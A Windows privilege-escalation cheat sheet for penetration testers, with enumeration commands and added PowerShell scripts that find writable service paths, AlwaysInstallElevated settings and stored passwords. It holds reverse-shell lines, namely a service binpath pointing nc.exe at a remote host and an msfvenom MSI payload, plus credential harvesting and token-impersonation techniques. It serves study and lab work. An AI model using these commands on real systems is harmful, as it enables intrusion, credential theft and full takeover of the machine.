Windows Privilege Escalation
Enumeration
OS Info Enumeration
systeminfo
hostname
echo %username%
wmic qfe -> check patches
wmic logicaldisk -> get other disk information
User Enumeration
whoami
whoami /priv -> check user privileges (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeBackupPrivilege, SeDebugPrivilege are the ones that usually lead somewhere)
whoami /groups -> check user groups
net user -> list all users
net user <username> -> show a user's account details and local/global group memberships
net localgroup -> Check all the local groups available
net localgroup <group name> -> List the members of the given localgroup
Task | Service | Process Enumeration
sc queryex type= service (lists all services, including stopped ones; note the space after "type=")
tasklist /SVC
tasklist
net start
DRIVERQUERY
wmic product get name, version, vendor
Permission Enumeration
icacls "C:\Program Files\<program>" -> check who can write (W, M or F) to a program's directory or binary
icacls root.txt /grant <username>:F (grant yourself full access to a file; only works if you own it or already hold WRITE_DAC on it)
Check the PowerShell history file of every user profile you can read (often contains credentials typed on the command line)
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Check stored usernames and passwords
cmdkey /list
Network based
ipconfig
ipconfig /all
arp -a
route print
netstat -ano
Password Hunting
AV / Firewall check / Service Enumeration
Scheduled Tasks
Mount Information
mountvol
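The Password Hunting, AV / Firewall check and Scheduled Tasks headings above list no commands. The PowerShell below is an added example (not part of the original page) that runs those checks from the unprivileged shell on the target. The search roots and file patterns for the credential grep are assumptions; widen them as the engagement allows. Get-MpComputerStatus only exists where Defender is installed, hence the -ErrorAction.

```powershell
# Added example (not from the original page): checks for the enumeration
# headings that list no commands. Run as the low-privileged user.

# --- AV / Firewall -----------------------------------------------------
Get-MpComputerStatus -ErrorAction SilentlyContinue |
    Select-Object AMServiceEnabled, RealTimeProtectionEnabled, AntivirusSignatureLastUpdated
netsh advfirewall show allprofiles state

# --- Scheduled Tasks ---------------------------------------------------
# Tasks that run as someone else are the interesting ones: if the action's
# binary or script is writable, it executes with the task's identity.
# Only tasks readable by the current user are returned.
Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
    $runsAs = $_.Principal.UserId
    foreach ($a in $_.Actions) {
        if ($a.Execute) {                       # skip COM-handler actions
            [pscustomobject]@{
                Task    = $_.TaskName
                RunsAs  = $runsAs
                Execute = $a.Execute
                Args    = $a.Arguments
            }
        }
    }
} | Where-Object { $_.RunsAs -and $_.RunsAs -ne $env:USERNAME } | Format-Table -AutoSize -Wrap

# --- Password Hunting --------------------------------------------------
# Registry: autologon credentials and PuTTY saved sessions
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue |
    Select-Object DefaultUserName, DefaultDomainName, DefaultPassword
Get-ChildItem 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue |
    Get-ItemProperty | Select-Object HostName, UserName, ProxyUsername, ProxyPassword

# Files: unattend/sysprep answer files, web.config, scripts and notes.
# Roots and patterns are assumptions, not an exhaustive list.
$roots    = @("$env:windir\Panther", "$env:windir\System32\Sysprep",
              "$env:SystemDrive\inetpub", "$env:SystemDrive\Users")
$patterns = @('*.xml', '*.config', '*.ini', '*.txt', '*.ps1', '*.bat', '*.cmd')
Get-ChildItem -Path $roots -Recurse -Include $patterns -File -ErrorAction SilentlyContinue |
    Select-String -Pattern 'password\s*[=:]' -List -ErrorAction SilentlyContinue |
    Select-Object Path, LineNumber, Line | Format-Table -AutoSize -Wrap
```

Every hit from the scheduled task listing still needs the permission check from the Permission Enumeration section (icacls on the Execute path) before it counts as a finding.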
Escalation Techniques
Service Account Priv Esc (Token Impersonation)
whoami /priv -> service accounts (IIS, MSSQL, etc.) usually hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege; either one allows impersonating a SYSTEM token obtained via a local NTLM relay (the "Potato" family of exploits)
Run As :
Use cmdkey /list to list the stored credentials on the machine.
Use runas /savecred /user:<domain\user> "<command>" to run a command with a stored credential, or runas /user:<user> "<command>" with a password you already have.
Access check :
accesschk.exe -ucqv [service_name] /accepteula
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
Find all weak file permissions per drive.
accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
Powershell :
Binary planting / service configuration abuse (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services)
sc qc [service_name] // service properties (binary path, account it runs as)
sc query [service_name] // service status
Requires SERVICE_CHANGE_CONFIG on the service (shown by the accesschk -ucqv check above) or write access to the binary it points at. Note the space after each "=" in sc config, it is part of the syntax.
sc config [service_name] binpath= "C:\Temp\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
net start [service_name]
The service control manager kills a binary that does not report itself as started within about 30 seconds, so use the shell quickly (e.g. add a user or copy a second payload) or point binpath= at a wrapper that spawns the payload and exits.
Unquoted Service Path Privilege Escalation
PATH directories with weak permissions
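The three service checks above (writable service binaries, unquoted service paths, weak PATH directories) share one question: which paths the service control manager will load that the current user can write to. The PowerShell below is an added example, not from the original page, that answers it with Get-Acl against every SID in the current token. It ignores Deny ACEs, so confirm each hit with the accesschk commands listed earlier. Requires PowerShell 3 or later; all cmdlets and classes used are standard.

```powershell
# Added example, not from the original page: find services whose binary,
# binary directory or unquoted-path split point the current user can write,
# plus writable directories on the machine-wide PATH.

# Every SID the token carries (user plus groups), so an ACE that grants
# Modify to "Users" or "Authenticated Users" counts as ours.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$mySids    = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })
$writeMask = [int]([Security.AccessControl.FileSystemRights]::Write -bor
                   [Security.AccessControl.FileSystemRights]::Modify -bor
                   [Security.AccessControl.FileSystemRights]::FullControl)

function Test-Writable {
    # True if any Allow ACE for one of our SIDs carries a write right.
    # Simplification: Deny ACEs are ignored, so confirm hits with accesschk.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                   # orphaned SID, cannot be ours
        if (($mySids -contains $sid) -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    # For  C:\Program Files\Some App\bin\svc.exe -arg  the service control
    # manager tries C:\Program.exe, then C:\Program Files\Some.exe, before the
    # real binary. Returns those shorter candidates; a writable parent
    # directory for any of them is a planting spot.
    param([string]$PathName)
    if ($PathName.StartsWith('"')) { return @() }          # quoted path: not vulnerable
    $exe = if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { $PathName }
    $segments = $exe -split ' '
    $candidates = @()
    for ($i = 0; $i -lt $segments.Count - 1; $i++) {
        $candidates += (($segments[0..$i] -join ' ') + '.exe')
    }
    return $candidates
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    if (-not $svc.PathName) { continue }
    $p = [Environment]::ExpandEnvironmentVariables($svc.PathName.Trim())
    # Strip quotes and arguments to get the executable path
    $exe = if ($p.StartsWith('"')) { $p.Split('"')[1] }
           elseif ($p -match '^(.*?\.exe)') { $Matches[1] }
           else { ($p -split ' ')[0] }
    $hits = @()
    if (Test-Writable $exe) { $hits += "binary writable: $exe" }
    $dir = Split-Path -Path $exe -Parent
    if (Test-Writable $dir) { $hits += "binary directory writable: $dir" }
    foreach ($c in Get-UnquotedPathCandidates $p) {
        if (Test-Writable (Split-Path -Path $c -Parent)) { $hits += "unquoted path, plant: $c" }
    }
    if ($hits) {
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                           StartMode = $svc.StartMode; Finding = ($hits -join '; ') }
    }
}
$findings | Format-Table -AutoSize -Wrap

# A writable directory on the machine-wide PATH lets us shadow a binary or
# DLL that a privileged process resolves through the search order.
[Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
    Where-Object { $_ -and (Test-Writable ([Environment]::ExpandEnvironmentVariables($_))) } |
    ForEach-Object { "writable PATH directory: $_" }
```

A service is only worth the effort if RunsAs is LocalSystem or another privileged account and you can restart it (StartMode Auto plus a reboot, or SERVICE_START rights shown by accesschk); a writable binary for a service you cannot restart waits for the next reboot.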
Always Install Elevated :
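AlwaysInstallElevated is only exploitable when both the machine (HKLM) and the user (HKCU) policy values are set to 1; a single key set to 1 is the usual false positive. The PowerShell below is an added example, not from the original page, that checks both and prints the follow-up steps; the .msi name and path are placeholders.

```powershell
# Added example (not from the original page): AlwaysInstallElevated check.
function Test-AlwaysInstallElevated {
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($k in $keys) {
        # Missing key or value reads as $null, which is "not set"
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; AlwaysInstallElevated = $v }
    }
    $values | Format-Table -AutoSize | Out-Host
    # Both values must be 1; either alone does nothing
    return (@($values | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq 2)
}

if (Test-AlwaysInstallElevated) {
    Write-Host 'Both policy values are 1: any .msi this user installs runs as SYSTEM.'
    Write-Host 'Build the package on the attacker, e.g.:'
    Write-Host '  msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o evil.msi'
    Write-Host 'Transfer it, start a listener, then on the target:'
    Write-Host '  msiexec /quiet /qn /i C:\Temp\evil.msi'
} else {
    Write-Host 'AlwaysInstallElevated not exploitable (needs both HKLM and HKCU set to 1).'
}
```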
Kernel Exploits :
run systeminfo, save the output to a file on the attacking machine and feed it to windows-exploit-suggester.py (see Automated Enumeration Tools below) to match the build and missing patches against known local exploits
Compiling Kernel Exploits :
cross-compile the exploit source on the attacking machine for the target's architecture (64-bit, or 32-bit for a 32-bit OS or process), then transfer the binary to the target; check systeminfo's "System Type" before choosing
Automated Enumeration Tools
Powershell:
powershell -ep bypass
load powershell (only in meterpreter)
Sherlock (https://github.com/rasta-mouse/Sherlock)
EXE : (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#exe)
Other : Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
Metasploit :
getsystem
run post/multi/recon/local_exploit_suggester
Resources :
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation (Win PrivEsc Checklist)